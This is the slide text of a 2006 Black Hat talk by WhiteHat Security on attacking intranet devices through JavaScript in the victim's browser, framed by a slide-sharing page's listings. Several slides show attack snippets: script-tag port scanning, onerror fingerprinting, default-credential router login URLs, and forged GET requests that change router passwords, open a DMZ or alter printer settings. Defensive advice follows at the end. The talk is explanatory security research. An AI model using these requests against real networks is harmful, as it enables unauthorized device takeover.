WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 

Último

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Último (20)

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Hacking Intranet Websites from the Outside

  • 1. 1 Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous" Black Hat (USA) - Las Vegas 08.03.2006 Jeremiah Grossman (Founder and CTO) T.C. Niedzialkowski (Sr. Security Engineer) Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 2. 2 WhiteHat Security WhiteHat Sentinel - Continuous Vulnerability Assessment and Management Service for Websites. Jeremiah Grossman (Founder and CTO) ‣Technology R&D and industry evangelist ‣Co-founder of the Web Application Security Consortium (WASC) ‣Former Yahoo Information Security Officer T.C. Niedzialkowski (Sr. Security Engineer) ‣Manages WhiteHat Sentinel service for enterprise customers ‣extensive experience in web application security assessments ‣key contributor to the design of WhiteHat's scanning technology. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 3. 3 Assumptions of Intranet Security Doing any of the following on the internet would be crazy, but on intranet... ‣Leaving hosts unpatched ‣Using default passwords ‣Not putting a firewall in front of a host Is OK because the perimeter firewalls block external access to internal devices. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 4. 4 Assumptions of Intranet Security WRONG! Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 5. 5 Everything is web-enabled routers, firewalls, printers, payroll systems, employee directories, bug tracking systems, development machines, web mail, wikis, IP phones, web cams, host management, etc etc. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 6. 6 Intranet users have access To access intranet websites, control a user (or the browser) which is on the inside. FTP Intranet Wiki X Printer JavaScript HTTP X Malware User New Web X Server SSH Firewall NetBIOS Bug IP Phone Tracking Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 7. 7 Hacking the Intranet JavaScript Malware Gets behind the firewall to attack the intranet. operating system and browser independent special thanks to... RSnake http://ha.ckers.org/ Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 8. 8 The following examples DO NOT use any well-known or un-patched web browser vulnerabilities. The code uses clever and sophisticated JavaScript, Cascading Style-Sheet (CSS), and Java Applet programming. Technology that is common to all popular web browsers. Example code is developed for Firefox 1.5, but the techniques should also apply to Internet Explorer. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 9. 9 Contracting JavaScript Malware 1.! ebsite owner embedded JavaScript malware. w 2.! eb page defaced with embedded JavaScript w malware. 3.! avaScript Malware injected into into a J public area of a website. (persistent XSS) 4. clicked on a specially-crafted link causing the website to echo JavaScript Malware. (non- persistent XSS) Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 10. 10 Stealing Browser History JavaScript can make links and has access to CSS APIs See the difference? Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 11. 11 Cycle through the most popular websites Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 12. 12 NAT'ed IP Address IP Address Java Applet This applet demonstrates that any server you visit can find out your real IP address if you enable Java, even if you're behind a firewall or use a proxy. Lars Kindermann http://reglos.de/myaddress/ Send internal IP address where JavaScript can access it <APPLET CODE="MyAddress.class"> <PARAM NAME="URL" VALUE="demo.html?IP="> </APPLET> If we can get the internal subnet great, if not, we can still guess for port scanning... Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 13. 13 JavaScript Port Scanning We can send HTTP requests to anywhere, but we can 't access the response (same-origin policy). So how do we know if a connection is made? <SCRIPT SRC=”http://192.168.1.100/”></SCRIPT> If a web server is listening on 192.168.1.100, HTML will be returned causing the JS interpreter to error. CAPTURE THE ERROR! Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 14. 14 Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 15. 15 Blind URL Fingerprinting There is a web server listening, but can 't see the response, what is it? Many web platforms have URL’s to images that are unique. Apache Web Server /icons/apache_pb.gif HP Printer /hp/device/hp_invent_logo.gif PHP Image Easter eggs /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 Use OnError! Cycle through unique URL’s using Image DOM objects <img src=”http://192.168.1.100/unique_image_url” onerror=”fingerprint()” /> If the onerror event does NOT execute, then it 's the associated platform. Technically, CSS and JavaScript pages can be used for fingerprinting as well. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 16. 16 Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 17. 17 DSL Wireless/Router Hacking Login, if not already authenticated Factory defaults are handy! http://admin:password@192.168.1.1/ Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 18. 18 Change the password /password.cgi? POST to GET sysOldPasswd=password&sysNewPasswd=newpass&sysConfirmP asswd=newpass&cfAlert_Apply=Apply Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 19. 19 DMZ Hacking /security.cgi? POST to GET dod=dod&dmz_enable=dmz_enable&dmzip1=192&dmzip2=168&d mzip3=1&dmzip4=9&wan_mtu=1500&apply=Apply&wan_way=1500 Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 20. 20 Network Printer Hacking POST to GET /hp/device/set_config_deviceInfo.html?DeviceDescription=0WNED! &AssetNumber=&CompanyName=&ContactPerson=&Apply=Apply Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 21. 21 Network Printer Hacking Auto-Fire Printer Test Pages POST to GET /hp/device/info_specialPages.html?Demo=Print Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 22. 22 More Dirty Tricks ‣black hat search engine optimization (SEO) ‣Click-fraud ‣Distributed Denial of Service ‣Force access of illegal content ‣Hack other websites (IDS sirens) ‣Distributed email spam (Outlook Web Access) ‣Distributed blog spam ‣Vote tampering ‣De-Anonymize people ‣etc. Once the browser closes there is little trace of the exploit code. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 23. 23 Anybody can be a victim on any website Trusted websites are hosting malware. Cross-Site Scripting (XSS) and Cross-Site Request Forgery vulnerabilities amplify the problem. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 24. 24 XSS Everywhere Attacks the user of a website, not the website itself. The most common vulnerability. SecurityFocus cataloged over 1,400 issues. WhiteHat Security has Identified over 1,500 in custom web applications. 8 in 10 websites have XSS. Tops the Web Hacking Incident Database (WHID) http://www.webappsec.org/projects/whid/ Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 25. 25 Exploited on popular websites Exploitation Leads to website defacement, session hi- jacking, user impersonation, worms, phishing scams, browser trojans, and more... Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 26. 26 CSRF, even more widespread A cross-site request forgery (CSRF or XSRF), although similar-sounding in name to cross-site scripting (XSS), is a very different and almost opposite form of attack. Whereas cross-site scripting exploits the trust a user has in a website, a cross-site request forgery exploits the trust a website has in a user by forging the enactor and making a request appear to come from a trusted user. Wikipedia http://en.wikipedia.org/wiki/Cross-site_request_forgery No statistics, but the general consensus is just about every piece of sensitive website functionality is vulnerable. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 27. 27 CSRF hack examples A story that diggs itself Users logged-in to digg.com visiting http:// 4diggers.blogspot.com/ will automatically digg the story http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/ Compromising your GMail contact list Contact list available in JavaScript space. <script src=http://mail.google.com/ mail/?_url_scrubbed> http://www.webappsec.org/lists/websecurity/archive/2006-01/msg00087.html Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 28. 28 Worms MySpace (Samy Worm) - first XSS worm 24 hours, 1 million users affected ‣logged-in user views samys profile page, embedded JavaScript malware. ‣Malware ads samy as their friend, updates their profile with “samy is my hero”, and copies the malware to their profile. ‣People visiting infected profiles are in turn infected causing exponential growth. http://namb.la/popular/tech.html Yahoo Mail (JS-Yamanner) ‣User receives a email w/ an attachment embedded with JavaScript malware. ‣User opens the attachment and malware harvesting @yahoo.com and @yahoogroups.com addresses from contact list. CROSS-SITE SCRIPTING WORMS AND VIRUSES “The Impending Threat and the Best Defense” ‣User is re-directed to another web page. http://www.whitehatsec.com/downloads/ http://ha.ckers.org/blog/20060612/yahoo-xss-worm/ WHXSSThreats.pdf Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 29. 29 Solutions How to protect yourself Or at least try Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 30. 30 Not going to work Useful for other threats, but not against JavaScript malware. Patching and anti-virus Corporate Web Surfing Filters Security Sockets Layer (SSL) Two Factor Authentication Stay away from questionable websites Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 31. 31 Better End-User Solutions ‣Be suspicious of long links, especially those that look like they contain HTML code. When in doubt, type the domain name manually into your browser location bar. ‣no web browser has a clear security Text advantage, but we prefer Firefox. For additional security, install browser add-ons such as NoScript (Firefox extension) or the Netcraft Toolbar. ‣When in doubt, disable JavaScript, Java, and Active X prior to your visit. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 32. 32 We Need More Browser Security ‣Mozilla (Firefox), Microsoft and Opera development teams must begin formalizing and implementing Content-Restrictions. Sites would define and serve content restrictions for pages which contained untrusted content which they had filtered. If the filtering failed, the content restrictions Text may still prevent malicious script from executing or doing damage. Gervase Markham http://www.gerv.net/security/content-restrictions/ ‣Mozilla (Firefox) developers, please implement httpOnly. It's been around for years! Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 33. 33 Fixing XSS and CSRF Preventing websites from hosting JavaScript Malware ‣rock solid Input Validation. This includes URL's, query strings, headers, post data, etc. filter HTML from output Text $data =~ s/(<|>|"|'|(|)|:)/'&#'.ord($1).';'/sge; or $data =~ s/([^w])/'&#'.ord($1).';'/sge; ‣Protect sensitive functionality from CSRF attack. Implement session tokens, CAPTCHAs and HTTP Referer checking. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 34. 34 Finding and Fixing ‣Find your vulnerabilities before the bad guys do. Comprehensive assessments combine automated vulnerability scanning and expert-driven analysis. ‣When absolutely nothing can go wrong with Text your website, consider a web application firewall (WAF). Defense-in-Depth (mod_security, URL Scan, SecureIIS). ‣ harden the intranet websites. They are no longer out of reach. Patch and change default password. Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 35. 35 Recommended Reading Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.
  • 36. 36 THANK YOU! Jeremiah Grossman Founder and Chief Technology Officer jeremiah@whitehatsec.com T.C. Niedzialkowski SR. Security Engineer tc@whitehatsec.com For more information about WhiteHat Security, please call 408.492.1817 or visit our website, www.whitehatsec.com Copyright © 2006 WhiteHat Security, inc. All Rights Reserved.